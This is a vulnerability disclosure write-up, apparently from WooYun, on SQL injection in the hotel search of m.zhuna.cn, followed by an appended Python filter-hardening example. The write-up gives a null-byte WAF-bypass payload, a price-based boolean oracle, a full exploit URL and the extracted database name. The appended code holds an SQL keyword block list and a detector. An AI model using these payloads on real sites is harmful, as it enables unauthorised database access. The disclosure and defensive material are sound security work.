
WAF-bypass injection on the front end of a Zhuna (住哪儿) site (on constructing the injection statement)

2015-05-28 01:35

Site: http://m.zhuna.cn

The hotel-name field of the hotel booking search is injectable.

[Screenshots: 1.png, 2.png]

The following information was obtained:

Filename: /var/wwwroot/testwap/wap/models/index_model.php

select * from (select ID,HotelName,cityname,eareaname,address,XingJi,Min_Jiage,Max_Jiage,df_haoping,x,y,CBD,dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng) as juli, px_dingdan ,dbo.compare(1,1,day10) as day10_isfull ,ROW_NUMBER() OVER ( ORDER BY dbo.compare(1,1,day10) desc, dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng), px_dingdan DESC, id DESC ) as rowslist from hotelinfo where ecityid = 0101 and shenhe = 1 AND (lat between 39.948688179804 and 40.048688179804) and (lng between 116.29375398973 and 116.39375398973 ) AND Min_Jiage >= 0 and hotelname like '%'%' and x is not null and y is not null ) as a where a.rowslist > 0 and a.rowslist <= 10

Next comes constructing the injection statement. The first attempt:

%' and 1=1 and '%'='

The site responds that dangerous characters are present:

[Screenshot: 3.png]

Modify the injection statement to get past the filter:

%' an%00d 1=1 an%00d '%'='

Next I found that 1=1, 1=2, 'A'='A' and the like cannot be used as the boolean condition (the query returns the same thing either way, namely no results, which is odd). I then tried time-based delays and error-based injection; these either produced a syntax error or a complaint that the function is not a built-in function.

[Screenshots: 4.png, 5.png]

The problem now is to find a condition that lets me tell the two outcomes apart in the output. Where can such a condition come from?

At this point I noticed there is a hotel-price filter; selecting one and searching,

[Screenshot: 6.png]

adds one more clause to the SQL statement:

AND Min_Jiage <= 150

The price is numeric, so if I can find a price for which exactly one hotel is returned, that can serve as the judging condition. Here the price filter is set back to "unlimited", and the price condition is inserted into the injection statement instead.

Find a suitable price that returns exactly one result:

AND Min_Jiage = 600

[Screenshots: 7.png, 8.png]

Continue constructing:

%' an%00d Min_Jiage = (ascii(substring(db_name(),1,1))+496) an%00d '%'='

http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=bj&tm1=2015-04-12&day=1&position=%E4%BA%94%E9%81%93%E5%8F%A3&keyword=%25%27+an%2500d+Min_Jiage+%3D+%28ascii%28substring%28db_name%28%29%2C1%2C1%29%29%2B496%29+an%2500d+%27%25%27%3D%27&price=

[Screenshots: 9.png, 10.png]

Proof of vulnerability:

This shows that the first character of db_name() is h (ascii 104 + 496 = 600). With a working condition in hand, the database name is finally recovered: db_name()=hotel_9tour_cn
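As an added defender-side example (not from the original report or the Zhuna site), the following Python models the keyword filter behaviour seen above: a single URL decode followed by a word match lets an%00d through, while decoding until the value is stable and dropping control bytes before matching flags both the an%00d bypass and the Min_Jiage oracle payload. The blocked-token list and the sample parameter values are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample values of the `keyword` query parameter as they would
# arrive at a filter inspecting the raw query string (assumption: the filter
# sees the encoded form). "nullbyte" has the payload shape used in the report.
SAMPLES = {
    "plain":    "%25%27+and+1%3D1+and+%27%25%27%3D%27",
    "nullbyte": "%25%27+an%2500d+Min_Jiage+%3D+%28ascii%28substring%28db_name"
                "%28%29%2C1%2C1%29%29%2B496%29+an%2500d+%27%25%27%3D%27",
    "benign":   "Hilton+Beijing",
}

# Assumed blocked-token list: boolean operators only. The report shows that
# ascii()/substring()/db_name() were not rejected, only the bare "and".
BLOCKED = re.compile(r"\b(and|or|union|select)\b", re.IGNORECASE)


def naive_check(raw: str) -> bool:
    """Decode once, then match: the behaviour the report's filter exhibits.
    'an%00d' decodes to 'an' + NUL + 'd', which no longer matches \\band\\b."""
    return BLOCKED.search(unquote(raw)) is not None


def normalize(raw: str, max_rounds: int = 3) -> str:
    """Decode until the value stops changing (so %2500 -> %00 -> NUL),
    then strip NUL and other control bytes before any keyword matching."""
    s = raw.replace("+", " ")
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return re.sub(r"[\x00-\x1f\x7f]", "", s)


def hardened_check(raw: str) -> bool:
    """Match against the normalized value instead of the once-decoded one."""
    return BLOCKED.search(normalize(raw)) is not None


def evaluate(samples: dict = SAMPLES) -> dict:
    """Return {name: (naive_flagged, hardened_flagged)} for each sample."""
    return {k: (naive_check(v), hardened_check(v)) for k, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in evaluate().items():
        print(f"{name:9s} naive={naive!s:5s} hardened={hardened}")
```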

Remediation:


Source: www.wooyun.org/bugs/wooyun-2015-0107520
